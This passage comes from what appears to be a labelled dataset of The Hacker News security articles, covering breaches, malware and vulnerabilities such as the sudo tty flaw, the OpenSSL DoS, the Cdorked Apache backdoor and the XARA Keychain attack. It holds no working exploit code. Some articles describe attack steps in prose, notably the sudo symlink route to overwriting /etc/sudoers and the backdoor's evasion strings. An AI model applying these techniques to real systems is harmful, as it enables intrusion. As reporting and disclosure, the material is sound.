native language. DNS Registration. Domains used in attacks pinpoint the attacker's location. Duplicate registration information can tie multiple domains to a common culprit. Language. Language artifacts embedded in malware often point to the attacker's country of origin and common language mistakes in phishing emails can sometimes be reverse-engineered to determine the writer's native language. Remote Administration Tool Configuration. Popular malware-creation tools include a bevy of configuration options. These options are often unique to the attacker using the tool, allowing researchers to tie disparate attacks to a common threat actor. Behavior. Behavioral patterns such as methods and targets give away some of the attacker's methods and motives. I found the report very interesting and I strongly suggest you its reading, to uncover cyber espionage campaign so articulated and complex it is fundamental to recognize the evidence of ongoing attacks and the real origin of the attackers. A targeted organization could use the knowledge on methods and objective of the attack for: Immediately shift resources to bolster vulnerable data Enlist additional help, whether internal resources or law enforcement More closely examine other vectors—possibly overlooked—that have been used by the attackers other campaigns ",Cyber_Attack U.S. drones affected by Keylogger Virus,https://thehackernews.com/2011/10/us-drones-affected-by-keylogger-virus.html,"U.S. drones affected by Keylogger Virus A keylogger of some sort has infiltrated classified and unclassified computer systems at Creech Air Force Base in Nevada, recording the keystrokes of pilots tasked with operating unmanned drone aircraft in Afghanistan and other international conflict zones. The virus, first detected nearly two weeks ago by the military's Host-Based Security System, has not prevented pilots at Creech Air Force Base in Nevada from flying their missions overseas. Nor have there been any confirmed incidents of classified information being lost or sent to an outside source. But the virus has resisted multiple efforts to remove it from Creech's computers, network security specialists say. And the infection underscores the ongoing security risks in what has become the U.S. military's most important weapons system. Tadd Sholtis, a spokesman for Air Combat Command, which oversees the drones and all other Air Force tactical aircraft said, ""We generally do not discuss specific vulnerabilities, threats, or responses to our computer networks, since that helps people looking to exploit or attack our systems to refine their approach. We invest a lot in protecting and monitoring our systems to counter threats and ensure security, which includes a comprehensive response to viruses, worms, and other malware we discover."" ",Malware "Uber Paid 20-Year-Old Florida Hacker $100,000 to Keep Data Breach Secret",https://thehackernews.com/2017/12/uber-hacker.html,"Last year, Uber received an email from an anonymous person demanding money in exchange for the stolen user database. It turns out that a 20-year-old Florida man, with the help of another, breached Uber's system last year and was paid a huge amount by the company to destroy the data and keep the incident secret. Just last week, Uber announced that a massive data breach in October 2016 exposed personal data of 57 million customers and drivers and that it paid two hackers $100,000 in ransom to destroy the information. However, the ride-hailing company did not disclose identities or any information about the hackers or how it paid them. Now, two unknown sources familiar with the incident have told Reuters that Uber paid a Florida man through HackerOne platform, a service that helps companies to host their bug bounty and vulnerability disclosure program. So far, the identity of the Florida man was unable to be obtained or another person who helped him carry out the hack. Notably, HackerOne, who does not manage or plays any role in deciding the rewards on behalf of companies, receives identifying information of the recipient (hackers and researchers) via an IRS W-9 or W-8BEN form before payment of the award can be made. In other words, some employees at Uber and HackerOne definitely knows the real identity of the hacker, but choose not to pursue the case, as the individual did not appear to pose any future threat to the company. Moreover, the sources also said that Uber conducted a forensic analysis of the hacker's computer to make sure that all the stolen data had been wiped, and had the hacker also sign a nondisclosure agreement to prevent further wrongdoings. Reportedly, the Florida man also paid some unknown portion of the received bounty to the second person, who was responsible for helping him obtain credentials from GitHub for access to Uber data stored elsewhere. Originally occurred in October 2016, the breach exposed the names and driver license numbers of some 600,000 drivers in the United States, and the names, emails, and mobile phone numbers of around 57 million Uber users worldwide, which included drivers as well. However, other personal details, like trip location history, dates of birth, credit card numbers, bank account numbers, and Social Security numbers, were not accessed in the attack. Former Uber CEO Travis Kalanick learned of the cyber attack in November 2016 and chose not to involve authorities, believing the company can easily and more effectively negotiate directly with the hackers to limit any harm to its customers. However, this secret dealing with the hackers eventually cost Uber security executives their jobs for handling the incident. Now Uber CEO Dara Khosrowshahi has reportedly fired Uber Chief Security Officer Joe Sullivan, and one of his deputies, Craig Clark, who worked to keep the data breach quiet. ""None of this should have happened, and I will not make excuses for it. While I cannot erase the past, I can commit on behalf of every Uber employee that we will learn from our mistakes,"" Khosrowshahi said. ""We are changing the way we do business, putting integrity at the core of every decision we make and working hard to earn the trust of our customers."" Last week, three more top Uber security managers resigned, including Sullivan's chief of staff Pooja Ashok, senior security engineer Prithvi Rai, and physical security chief Jeff Jones. ",Cyber_Attack High-Severity Linux Sudo Flaw Allows Users to Gain Root Privileges,https://thehackernews.com/2017/05/linux-sudo-root-hack.html,"A high-severity vulnerability has been reported in Linux that could be exploited by a low privilege attacker to gain full root access on an affected system. The vulnerability, identified as CVE-2017-1000367, was discovered by researchers at Qualys Security in Sudo's ""get_process_ttyname()"" function for Linux that could allow a user with Sudo privileges to run commands as root or elevate privileges to root. Sudo, stands for ""superuser do!,"" is a program for Linux and UNIX operating systems that lets standard users run specific commands as a superuser (aka root user), such as adding users or performing system updates. The flaw actually resides in the way Sudo parsed ""tty"" information from the process status file in the proc filesystem. On Linux machines, sudo parses the /proc/[pid]/stat file in order to determine the device number of the process's tty from field 7 (tty_nr), Qualys Security explains in its advisory. Although the fields in the file are space-delimited, it is possible for field 2 (the command name) to include whitespace (including newline), which sudo doesn't account for. Therefore, a local user with sudo privileges (Sudoer) on SELinux-enabled systems can cause sudo to use a device number of his choice ""by creating a symbolic link from the sudo binary to a name that contains a space, followed by a number,"" escalating their privileges to overwrite any file on the filesystem, including root-owned files. ""To exploit the bug, the user can choose a device number that does not currently exist under /dev. If sudo does not find the terminal under the /dev/pts directory, it performs a breadth-first search of /dev...The attacker may then create a symbolic link to the newly-created device in a world-writable directory under /dev, such as /dev/shm,"" an alert on the sudo project website reads. ""This file will be used as the command's standard input, output and error when an SELinux role is specified on the sudo command line. If the symbolic link under /dev/shm is replaced with a link to another file before [sudo opens it], it is possible to overwrite an arbitrary file by writing to the standard output or standard error. This can be escalated to full root access by rewriting a trusted file such as /etc/shadow or even /etc/sudoers."" The vulnerability, which affects Sudo 1.8.6p7 through 1.8.20 and marked as high severity, has already been patched in Sudo 1.8.20p1, and users are recommended to update their systems to the latest release. Red Hat yesterday pushed out patches for Red Hat Enterprise Linux 6, Red Hat Enterprise Linux 7, and Red Hat Enterprise Linux Server. Debian has also released fixes for its Wheezy, Jessie and Sid releases and SUSE Linux has rolled out fixes for a number of its products. Qualys Security said it would publish its Sudoer-to-root exploit once a maximum number of users have had time to patch their systems against the flaw. ",Vulnerability Lenovo Website has been Hacked,https://thehackernews.com/2015/02/lenovo-hacked.html,"Lenovo.com, the official website of world's largest PC maker has been hacked. At the time of writing, users visiting Lenovo.com website saw a teenager's slideshow and hacker also added song ""Breaking Free"" from High School Musical movie to the page background. It appears that Lizard Squad hacking group is responsible for the cyber attack against Lenovo and it could be in retaliation to the Superfish malware incident. It was revealed earlier this week that Lenovo had been pre-installing controversial 'Superfish' adware to its laptops which compromised the computer's encryption certificates to quietly include more ads on Google search. In the Source code of the hacked webpage, description says,""The new and improved rebranded Lenovo website featuring Ryan King and Rory Andrew Godfrey"" Rory Andrew Godfrey and Ryan King have been previously identified as members of Lizard Squad Hacking Group. It is not clear whether anyone of them is involved in the hack or it is quite possible that attacker is trying to expose the real identity of the hacking crew. The Superfish Malware raised serious security concerns about the company's move for breaking fundamental web security protocols, because anyone with the password that unlocks that single password-protected certificate authority would be able to completely bypass the computer's web encryption. After that Facebook security team also discovered at least 12 more apps using the same ""SSL hijacking"" technology that gave the Superfish malware capability to evade rogue certificate. Although Lenovo has admitted their mistake and distributing a Superfish removal tool for cleaning computer. ",Malware Orange.es Vulnerable To SQLi - Found by Invectus,https://thehackernews.com/2011/08/orangees-vulnerable-to-sqli-found-by.html,"Orange.es Vulnerable To SQLi - Found by Invectus People have never focused on SQL injection much, They have no clue that its the most common method which big companies are vulnerable to. Hacker with name ""Invectus"" , Found the SQL injection Vulnerability in Orange.es. Vulnerability has been exposed via Social Networks. ",Vulnerability Critical DoS Flaw found in OpenSSL — How It Works,https://thehackernews.com/2016/09/openssl-dos-attack.html,"The OpenSSL Foundation has patched over a dozen vulnerabilities in its cryptographic code library, including a high severity bug that can be exploited for denial-of-service (DoS) attacks. OpenSSL is a widely used open-source cryptographic library that provides encrypted Internet connections using Secure Sockets Layer (SSL) or Transport Layer Security (TLS) for the majority of websites, as well as other secure services. The vulnerabilities exist in OpenSSL versions 1.0.1, 1.0.2 and 1.1.0 and patched in OpenSSL versions 1.1.0a, 1.0.2i and 1.0.1u. The Critical-rated bug (CVE-2016-6304) can be exploited by sending a large OCSP Status Request extension on the targeted server during connection negotiations, which causes memory exhaustion to launch DoS attacks, the OpenSSL Project said. What is OCSP Protocol? OCSP(Online Certificate Status Protocol), supported by all modern web browsers, is a protocol designed to perform verification and obtain the revocation status of a digital certificate attached to a website. OCSP divided into client and server components. When an application or a web browser attempts to verify an SSL certificate, the client component sends a request to an online responder via HTTP protocol, which in turn, returns the status of the certificate, valid or not. Reported by Shi Lei, a researcher at Chinese security firm Qihoo 360, the vulnerability affects servers in their default configuration even if they do not support OCSP. ""An attacker could use the TLS extension ""TLSEXT_TYPE_status_request"" and fill the OCSP ids with continually renegotiation,"" the researcher explained in a blog post. ""Theoretically, an attacker could continually renegotiation with the server thus causing unbounded memory growth on the server up to 64k each time."" How to Prevent OpenSSL DoS Attack Administrators can mitigate damage by running 'no-ocsp.' Furthermore, servers using older versions of OpenSSL prior to 1.0.1g are not vulnerable in their default configuration. Another moderate severity vulnerability (CVE-2016-6305) that can be exploited to launch denial of service attacks is fixed in the patch release, affecting OpenSSL 1.1.0 that was launched less than one month ago. The team has also resolved a total of 12 low severity vulnerabilities in the latest versions of OpenSSL, but most of them do not affect the 1.1.0 branch. It is worth noting that the OpenSSL Project will end support for OpenSSL version 1.0.1 on 31st December 2016, so users will not receive any security update from the beginning of 2017. Therefore users are advised to upgrade in order to avoid any security issues. ",Vulnerability Top 3 Focus Areas that can help you in Data Loss Prevention,https://thehackernews.com/2013/10/top-3-focus-areas-that-can-help-you-in.html,"One of the most intimidating issues that gives nightmares to IT teams across organizations is data breaches or data loss. Typically, data loss happens when security is compromised and corporate sensitive data is accessed. It might fall under any of these categories: Unauthorized, intentional or unintentional exfiltration of confidential information Data spill or data leak This can happen due to external security attacks like malware, hacking or sometimes even from an internal source such as a disgruntled employee. This calls for a data loss prevention (DLP) system in place that would help you contain and avoid the loss of data. Data loss happens in many stages and can be broadly categorized into three categories: Data in Motion: Data that moves through the network to the outside, in most cases using the Internet Data at Rest: Data that rests in your database and other provisions for storage Data at the Endpoints: Data at the endpoints of your network, say, data on USB and other plugged-in devices. What is Data Loss Prevention? DLP is a strategy to make sure that your sensitive data don't move outside of your network. It helps you reduce the risk of the disclosure of confidential information. With the continuous increase in cybercrime, it becomes all the more necessary to protect data breach across various stages. Here are some focus areas that can help you minimize data loss: 1. Identify the Top Data Loss Scenarios If you look into all the data loss scenarios thus far, you will be able to cull out a pattern as to which are the ones that have had the highest impact. Also there may be relatively minor data loss incidents but it might be occurring multiple times in a day. Action item: Identify and classify data based on their sensitivity and keep an eye on their flow within the network and outside. Your classification can be based on the type of data as well, for example, customer data, financial data, etc. Once this is done, based on your security and compliance requirements, you need to build security policies. It is advisable to use a SIEM security tool that will correlate and alerts you in real time upon any security breach. 2. Actively respond to Security Incidents Once the radar is lit up, security events, tend to pile up thick and fast. It is important to have a dedicated methodology to analyze and respond to all valid security events. Action item: As you begin to monitor the log events in real time, you would be able to quickly spot security threats. You can deploy an efficient log management tool with active response technology that can help you mitigate and remediate violations and deliver automated responses based on the security incident. 3. Comply with Policy Regulations If you are handling sensitive and confidential information, you need to be compliant with policy regulations such as FISMA, PCI DSS, HIPAA, etc. Based on the industry in which you operate. For example, if your business involves payment card transactions, you need to be PCI compliant as you are responsible for protecting the cardholder data when you receive it. Action item: If you are PCI Compliant you need to encrypt the cardholder data with at least a 128 bit SSL certificate to meet this standard. It requires constant assessment and reporting and employees across different levels should get involved to make it effective. SIEM tools help you quickly uncover compliance policy violations by identifying attacks, and highlighting threats with real-time log analysis and powerful cross-device and cross-event correlation covering your entire infrastructure. SolarWinds Log and Event Manager (LEM) help you quickly uncover policy violations and performs multiple event correlation to understand relationships between dramatically different activities. With it's with real-time log analysis and powerful cross-device/cross-event correlation, LEM lets you effectively identify and respond to threats in real time, rather than being reactive. LEM also provides over 300 pre-built ""audit-proven"" templates so you can easily generate and schedule PCI and other regulatory compliance reports, as well as customize reports for your organization's specific needs. Yaagneshwaran Ganesh - Product Marketing Specialist at SolarWinds, with a primary focus on Information Security. Experience across Sales, Market Research,etc.(Google+ Profile) ",Data_Breaches Attackers Abusing Citrix NetScaler Devices to Launch Amplified DDoS Attacks,https://thehackernews.com/2020/12/citrix-adc-ddos-attack.html,"Citrix has issued an emergency advisory warning its customers of a security issue affecting its NetScaler application delivery controller (ADC) devices that attackers are abusing to launch amplified distributed denial-of-service (DDoS) attacks against several targets. ""An attacker or bots can overwhelm the Citrix ADC [Datagram Transport Layer Security] network throughput, potentially leading to outbound bandwidth exhaustion,"" the company noted. ""The effect of this attack appears to be more prominent on connections with limited bandwidth."" ADCs are purpose-built networking appliances whose function is to improve the performance, security, and availability of applications delivered over the web to end-users. The desktop virtualization and networking service provider said it's monitoring the incident and is continuing to investigate its impact on Citrix ADC, adding ""the attack is limited to a small number of customers around the world."" The issue came to light after multiple reports of a DDoS amplify attack over UDP/443 against Citrix (NetScaler) Gateway devices at least since December 19, according to Marco Hofmann, an IT administrator for a German software firm ANAXCO GmbH. Datagram Transport Layer Security or DTLS is based on the Transport Layer Security (TLS) protocol that aims to provide secure communications in a way that's designed to thwart prevent eavesdropping, tampering, or message forgery. Since DTLS uses the connectionless User Datagram Protocol (UDP) protocol, it's easy for an attacker to spoof an IP packet datagram and include an arbitrary source IP address. Thus when the Citrix ADC is flooded with an overwhelming flux of DTLS packets whose source IP addresses are forged to a victim IP address, the elicit responses lead to an oversaturation of bandwidth, creating a DDoS condition. Citrix is currently working to enhance DTLS to eliminate the susceptibility to this attack, with an expected patch to be released on January 12, 2021. To determine if a Citrix ADC equipment is targeted by the attack, Cisco recommends keeping an eye on the outbound traffic volume for any significant anomaly or spikes. Customers impacted by the attack, in the meantime, can disable DTLS while a permanent fix from Citrix is pending by running the following command on the Citrix ADC: ""set vpn vserver -dtls OFF."" ",Cyber_Attack Here's how hackers are targeting Cisco Network Switches in Russia and Iran,https://thehackernews.com/2018/04/hacking-cisco-smart-install.html,"Since last week, a new hacking group, calling itself 'JHT,' hijacked a significant number of Cisco devices belonging to organizations in Russia and Iran, and left a message that reads—""Do not mess with our elections"" with an American flag (in ASCII art). MJ Azari Jahromi, Iranian Communication and Information Technology Minister, said the campaign impacted approximately 3,500 network switches in Iran, though a majority of them were already restored. The hacking group is reportedly targeting vulnerable installations of Cisco Smart Install Client, a legacy plug-and-play utility designed to help administrators configure and deploy Cisco equipments remotely, which is enabled by default on Cisco IOS and IOS XE switches and runs over TCP port 4786. Some researchers believe the attack involves a recently disclosed remote code execution vulnerability (CVE-2018-0171) in Cisco Smart Install Client that could allow attackers to take full control of the network equipment. However, since the hack apparently resets the targeted devices, making them unavailable, Cisco believes hackers have been merely misusing the Smart Install protocol itself to overwrite the device configuration, instead of exploiting a vulnerability. ""The Cisco Smart Install protocol can be abused to modify the TFTP server setting, exfiltrate configuration files via TFTP, modify the configuration file, replace the IOS image, and set up accounts, allowing for the execution of IOS commands,"" the company explains. Chinese security firm Qihoo 360's Netlab also confirms that that hacking campaign launched by JHT group doesn't involve the recently disclosed code execution vulnerability; instead, the attack is caused due to the lack of any authentication in the Cisco smart install protocol, reported in March last year. According to Internet scanning engine Shodan, more than 165,000 systems are still exposed on the Internet running Cisco Smart Install Client over TCP port 4786. Since Smart Install Client has been designed to allow remote management on Cisco switches, system administrators need to enable it but should limit its access using Interface access control lists (ACLs). Administrators who do not use the Cisco Smart Install feature at all should disable it entirely with the configuration command—""no vstack."" Although recent attacks have nothing to do with CVE-2018-0171, admins are still highly recommended to install patches to address the vulnerability, as with technical details and proof-of-concept (PoC) already available on the Internet, hackers could easily launch their next attack leveraging this flaw. ",Cyber_Attack Exploit Packs updated with New Java Zero-Day vulnerability,https://thehackernews.com/2013/01/exploit-packs-updated-with-new-java.html,"A new Java 0-day vulnerability has been discovered, already wind in use by an exploit pack, taking advantage of a fresh zero-day vulnerability in Java and potentially letting hackers take over users' machines. Java 7 Update 10 and earlier contain an unspecified vulnerability that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. The flaw was first spotted by 'Malware Don't Need Coffee' blog. This vulnerability is being attacked in the wild, and is reported to be incorporated into exploit kits. This exploit is already available in two Exploit Packs, that is available for $700 a quarter or $1,500 for a year. Similar tactics were used in CVE-2012-4681, which was discovered last August. Source of this new Exploit available to download Here. The two most popular exploits packs used by hackers to distribute malware, the BlackHole Exploit Kit and the Cool Exploit Kit already having this latest Java Zero-Day exploit. Blackhole kit is usually installed on compromised websites and uses vulnerabilities in web browsers and other software to inject malware into visitors' PCs. The creator of Blackhole, who uses the nickname 'Paunch,' announced yesterday on several Under web forums that the Java zero-day was a 'New Year's Gift,' to customers who use his exploit kit. Vulnerability was later confirmed by security firm AlienVault Labs, ""On the other hand we expect a Metasploit module in the upcoming days as it has been happening during the last year as well as most of the exploit kits adopting this new zeroday sooner than later."" Last option for readers, deactivate the Java plugin in their browsers without delay. ",Vulnerability New Apache backdoor serving Blackhole exploit kit,https://thehackernews.com/2013/04/new-apache-backdoor-serving-blackhole.html,"A new sophisticated and stealthy Apache backdoor meant to drive traffic to malicious websites serving Blackhole exploit kit widely has been detected by Sucuri recently. Researchers claimed that this backdoor affecting hundreds of web servers right now. Dubbed Linux/Cdorked.A, one of the most sophisticated Apache backdoors we have seen so far. The backdoor leaves no traces of compromised hosts on the hard drive other than its modified httpd binary, thereby complicating forensics analysis. All of the information related to the backdoor is stored in shared memory. The configuration is pushed by the attacker through obfuscated HTTP requests that aren't logged in normal Apache logs. The HTTP server is equipped with a reverse connect backdoor that can be triggered via a special HTTP GET request. This means that no command and control information is stored anywhere on the system. ESET researchers analyzed the binary and discovered a nasty hidden backdoor. In the Linux/Cdorked binary all the important or suspicious strings are encrypted and analysed version contains a total of 70 strings that are encoded this way. The backdoor will check if the URL, the server name, or the referrer matches any of the following strings : '*adm*', '*webmaster*', '*submit*', '*stat*', '*mrtg*', '*webmin*', '*cpanel*', '*memb*', '*bucks*', '*bill*', '*host*', '*secur*', '*support*'. This is probably done to avoid sending malicious content to administrators of the website, making the infection harder to spot. Researchers also found 23 commands in Linux/Cdorked.A that can be sent to the server via a POST to a specially crafted URL ie. command list : 'DU', 'ST', 'T1′, 'L1′, 'D1′, 'L2′, 'D2′, 'L3′, 'D3′, 'L4′, 'D4′, 'L5′, 'D5′, 'L6′, 'D6′, 'L7′, 'D7′, 'L8′, 'D8′, 'L9′, 'D9′, 'LA', 'DA'. When attackers get full root access to the server, they can do anything they want. From modifying configurations, to injecting modules and replacing binaries. ",Malware Hackers Could Turn Pre-Installed Antivirus App on Xiaomi Phones Into Malware,https://thehackernews.com/2019/04/xiaomi-antivirus-app.html,"What could be worse than this, if the software that's meant to protect your devices leave backdoors open for hackers or turn into malware? Researchers today revealed that a security app that comes pre-installed on more than 150 million devices manufactured by Xiaomi, China's biggest and world's 4th largest smartphone company, was suffering from multiple issues that could have allowed remote hackers to compromise Xiaomi smartphones. According to CheckPoint, the reported issues resided in one of the pre-installed application called, Guard Provider, a security app developed by Xiaomi that includes three different antivirus programs packed inside it, allowing users to choose between Avast, AVL, and Tencent. Since Guard Provider has been designed to offer multiple 3rd-party programs within a single app, it uses several Software Development Kits (SDKs), which according to researchers is not a great idea because data of one SDK cannot be isolated and any issue in one of them could compromise the protection provided by others. ""The hidden disadvantages in using several SDKs within the same app lie in the fact that they all share the app context and permissions,"" the security firm says. ""While minor bugs in each individual SDK can often be a standalone issue, when multiple SDKs are implemented within the same app it is likely that even more critical vulnerabilities will not be far off."" It turns out that before receiving the latest patch, Guard Provider was downloading antivirus signature updates through an unsecured HTTP connection, allowing man-in-the-middle attackers sitting on open WiFi network to intercept your device's network connection and push malicious updates. ""Once connected to the same Wi-Fi network as the victim – say, in public places i.e. at restaurants, coffee shops, or malls – the attacker would be able to gain access to the phone owner's pictures, videos, and other sensitive data, or inject malware,"" CheckPoint told The Hacker News. However, the actual attack scenario is not as straightforward as it may sound. As explained by CheckPoint, researchers successfully achieved remote code execution on the targeted Xiaomi device after exploiting four separate issues in two different SDKs available in the app. The attack basically leveraged the use of unsecured HTTP connection, a path-traversal vulnerability and lack of digital signature verification while downloading and installing an antivirus update on the device. ""It is completely understandable that users would put their trust in smartphone manufacturers' preinstalled apps, especially when those apps claim to protect the phone itself,"" the firm says. Check Point reported the issues to the company and confirmed that Xiaomi has now fixed the issues in the latest version of its Guard Provider app. So, if you own a Xiaomi smartphone you should make sure your security software is up-to-date. ",Vulnerability New High-Severity Vulnerability Reported in Pulse Connect Secure VPN,https://thehackernews.com/2021/05/new-high-severity-vulnerability.html,"Ivanti, the company behind Pulse Secure VPN appliances, has published a security advisory for a high severity vulnerability that may allow an authenticated remote attacker to execute arbitrary code with elevated privileges. ""Buffer Overflow in Windows File Resource Profiles in 9.X allows a remote authenticated user with privileges to browse SMB shares to execute arbitrary code as the root user,"" the company said in an alert published on May 14. ""As of version 9.1R3, this permission is not enabled by default."" The flaw, identified as CVE-2021-22908, has a CVSS score of 8.5 out of a maximum of 10 and impacts Pulse Connect Secure versions 9.0Rx and 9.1Rx. In a report detailing the vulnerability, the CERT Coordination Center said the issue stems from the gateway's ability to connect to Windows file shares through a number of CGI endpoints that could be leveraged to carry out the attack. ""When specifying a long server name for some SMB operations, the 'smbclt' application may crash due to either a stack buffer overflow or a heap buffer overflow, depending on how long of a server name is specified,"" CERT/CC detailed in a vulnerability note published on Monday, adding it was able to trigger the vulnerable code by targeting the CGI script '/dana/fb/smb/wnf.cgi.' Pulse Secure customers are recommended to upgrade to PCS Server version 9.1R.11.5 when it becomes available. In the interim, Ivanti has published a workaround file ('Workaround-2105.xml') that can be imported to disable the Windows File Share Browser feature by adding the vulnerable URL endpoints to a blocklist and thus activate necessary mitigations to protect against this vulnerability. It bears noting that users running PCS versions 9.1R11.3 or below would need to import a different file named 'Workaround-2104.xml,' necessitating that the PCS system is running 9.1R11.4 before applying the safeguards in 'Workaround-2105.xml.' While Ivanti has recommended turning off Windows File Browser on the Admin UI by disabling the option 'Files, Window [sic]' for specific user roles, CERT/CC found the steps were inadequate to protect against the flaw during its testing. ""The vulnerable CGI endpoints are still reachable in ways that will trigger the 'smbclt' application to crash, regardless of whether the 'Files, Windows' user role is enabled or not,"" it noted. ""An attacker would need a valid DSID and 'xsauth' value from an authenticated user to successfully reach the vulnerable code on a PCS server that has an open Windows File Access policy."" The disclosure of a new flaw arrives weeks after the Utah-based IT software company patched multiple critical security vulnerabilities in Pulse Connect Secure products, including CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900, the first of which was found to be actively exploited in the wild by at least two different threat actors. ",Vulnerability Tesla Model S Hack Could Let Thieves Clone Key Fobs to Steal Cars,https://thehackernews.com/2018/09/tesla-model-s-remote-hack.html,"Despite having proper security measures in place to protect the driving systems of its cars against cyber attacks, a team of security researchers discovered a way to remotely hack a Tesla Model S luxury sedans in less than two seconds. Yes, you heard that right. A team of researchers from the Computer Security and Industrial Cryptography (COSIC) group of the Department of Electrical Engineering at the KU Leuven University in Belgium has demonstrated how it break the encryption used in Tesla's Model S wireless key fob. With $600 in radio and computing equipment that wirelessly read signals from a nearby Tesla owner's fob, the team was able to clone the key fob of Tesla's Model S, open the doors and drive away the electric sports car without a trace, according to Wired. ""Today it's very easy for us to clone these key fobs in a matter of seconds,"" Lennert Wouters, one of the KU Leuven researchers, told Wired. ""We can completely impersonate the key fob and open and drive the vehicle."" Also Read: Researchers Show How to Steal Tesla Car by Hacking into Owner's Smartphone. Tesla's Key Fob Cloning Attack Takes Just 1.6 Seconds Like most automotive keyless entry systems, Tesla Model S key fobs also work by sending an encrypted code to a car's radios to trigger it to unlock the doors, enabling the car to start. However, the KU Leuven researchers found that Tesla uses a keyless entry system built by a manufacturer called Pektron, which uses a weak 40-bit cipher to encrypt those key fob codes. The researchers made a 6-terabyte table of all possible keys for any combination of code pairs, and then used a Yard Stick One radio, a Proxmark radio, and a Raspberry Pi mini-computer, which cost about $600 total—not bad for a Tesla Model S though—to capture the required two codes. With that table and those two codes, the team says it can calculate the correct cryptographic key to spoof any key fob in just 1.6 seconds. To understand more clearly, you can watch the proof of concept video demonstration which shows the hack in action. The team reported the issue to Tesla last year, but the company addressed it in June 2018 by upgrading the weak encryption. Last month, the company also added an optional PIN as an additional defense. Tesla Paid $10,000 Bounty to the Researchers After the story broke, Tesla was criticised on Twitter for using a weak cipher, though a member of the KU Leuven team appreciated Tesla for quickly responding to their report and fixing the issue,, on the same time, accused other vehicle makers using keyless entry tech from the same vendor and ignoring reports. Also Read: Hackers take Remote Control of Tesla's Brakes and Door locks from 12 Miles Away. ""Everybody is making fun of Tesla for using a 40-bit key (and rightly so),"" Cryp·tomer tweeted. ""But Tesla at least had a mechanism we could report to and fixed the problem once informed. McLaren, Karma, and Triumph used the same system and ignored us."" Tesla paid the KU Leuven team a $10,000 bounty and plans to add the researchers' names to its Hall of Fame. ",Vulnerability KILLER! Unpatched WinRAR Vulnerability Puts 500 Million Users At Risk,https://thehackernews.com/2015/09/winrar-vulnerability.html,"Beware Windows Users! A new dangerous unpatched Zero-day Vulnerability has been detected in the latest version of WinRAR affects over millions of users worldwide. According to Mohammad Reza Espargham, a security researcher at Vulnerability-Lab, the stable version of WinRAR 5.21 for Windows computers is vulnerable to Remote Code Execution (RCE) flaw. WinRAR is one of the most popular utility program used to compress and decompress files with more than 500 Million installations worldwide. The WinRAR RCE vulnerability lie under the 'High Severity' block, and scores 9 on CVSS (Common Vulnerability Scoring System). HOW WINRAR VULNERABILITY WORKS? Let's take a look at its actions. The vulnerability can be used by any attacker smartly to insert a malicious HTML code inside the ""Text to display in SFX window"" section when the user is creating a new SFX file. WinRAR SFX is an executable compressed file type containing one or more file and is capable of extracting the contents of its own. According to proof-of-concept video published by Espargham, latest WinRAR vulnerability allows remote hackers to execute arbitrary code on a victim's computer when opening an SFX file (self-extracting file). Successful Exploitation requires low user interaction, and results in compromising users': System Network Devic The major disadvantage arises because of SFX files, as they start functioning as soon as the user clicks on them. Therefore, users cannot identify and verify if the compressed executable file is a genuine WinRAR SFX module or a harmful one. NO PATCH YET AVAILABLE Unfortunately, there is no patch yet available to fix this vulnerability. However, Windows users are advised to: Use an alternate archiving software Do not click files received from unknown sources Use strict authentication methods to secure your system ""As for any exe file, users must run SFX archives only if they are sure that such archive is received from a trustworthy source. SFX archive can silently run any exe file contained in an archive, and this is the official feature needed for software installers"", WinRAR developer team at RARLAB quoted. ",Vulnerability 16 Million German Users' Data Compromised in mysterious Botnet Malware attack,https://thehackernews.com/2014/01/16-million-german-users-data.html,"A New day begins with a Cup of Coffee and with new massive Data Breach News. This time in Germany, the Digital identities of about 16 million online users had been stolen, and posing a risk to their accounts linked to social media and other services. Federal Office for Information Security (BSI) discovered a security breach after running an analysis of the botnet network of computers infected with malware. The compromised accounts have email addresses as their username and also the passwords were stolen, that could also be sold to spammers and people looking to ""phish"" account holders. Until now it hasn't been known that how and when the analysis was carried out and who exactly were involved behind this massive data breach, as the BSI refused to give details on the source of the information. Authorities have set up a German-language website which allows users to enter their email address and check whether their email accounts are compromised or not. The officer advised those with compromised email addresses to change their passwords of ""social networking sites, online shops, email accounts and other online services;"" and check their computers for malware and viruses and also assured the user that they are taking necessary security measures against it. An Agency spokesman, Tim Griese, said about half the accounts have '.de' domain-name endings, denoting German-based accounts, and it appears the majority of users are in Germany, RT reports. Data breach has become a burning issue these days, and a problem which is skyrocketing! ",Data_Breaches Zero-Day Exploits for Stealing OS X and iOS Passwords,https://thehackernews.com/2015/06/iphone-password-hacking.html,"I think you'll agree with me when I say: Apple devices are often considered to be more safe and secure than other devices that run on platforms like Windows and Android, but a recent study will make you think twice before making this statement. A group of security researchers have uncovered potentially deadly zero-day vulnerabilities in both iOS and OS X operating systems that could put iPhone/iPad or Mac owners at a high risk of cyber attacks. Researchers have created and published a malicious app on the App Store that was able to siphon users' personal data from the password storing Keychain in Apple's OS X, as well as steal passwords from iCloud, banking and email accounts. Dubbed XARA (cross-app resource access), the malware exploit app was able to bypass the OS X sandboxing mechanisms that are supposedly designed to prevent an app from accessing the credentials, contacts, and other important data related to other apps. The Consequences are Dire! In their paper, titled ""Unauthorized Cross-App Resource Access on MAC OS X and iOS"" [PDF], the researchers claim that once installed, their app can obtain data from applications such as Dropbox, Facebook and Evernote, along with the popular messaging app WeChat, and even siphon passwords from 1Password. ""The consequences are dire,"" researchers wrote in the paper. ""For example, on the latest Mac OS X 10.10.3, our sandboxed app successfully retrieved from the system's keychain the passwords and secret tokens of iCloud, email and all kinds of social networks...bank and Gmail passwords from Google Chrome."" The Researchers also noted that the hack attack is only possible when the attributes of the victim's keychain item are predictable. However, most of the services share the same name across Keychain stores. The Keychain issue stems from its inability to verify which app owns a credential in Keychain, and even the OS doesn't check for any suspicious activity. Bypassed Apple's App Store Security Checks The malicious app was also able to bypass the Apple's App store security checks that are designed to ensure one app can not gain access to other apps' data without permission. However, the more worrisome part regarding the malicious app is that it was approved by Apple for placement in its App Store, which is supposed to be pre-examine by Apple security engineers for potentially malicious apps. Apple did not immediately respond to a request for comment. The zero-day flaws discovered by the Indiana University boffins Xing; Xiaolong Bai; XiaoFeng Wang; and Kai Chen joined Tongxin Li, of Peking University, and Xiaojing Liao, of Georgia Institute of Technology, was reported to Apple last October, but the company requested a 6 month period before making it public. However, according to their paper, the issues persist and millions of Apple users can still be affected by these zero-day flaws. How to Protect your Devices A system-wide update to Apple's OS X and iOS is the only way to protect yourself fully against these vulnerabilities, the researchers said. However, we are patiently waiting to hear from Apple that how it's planning to resolve this huge issue. To protect yourselves against such 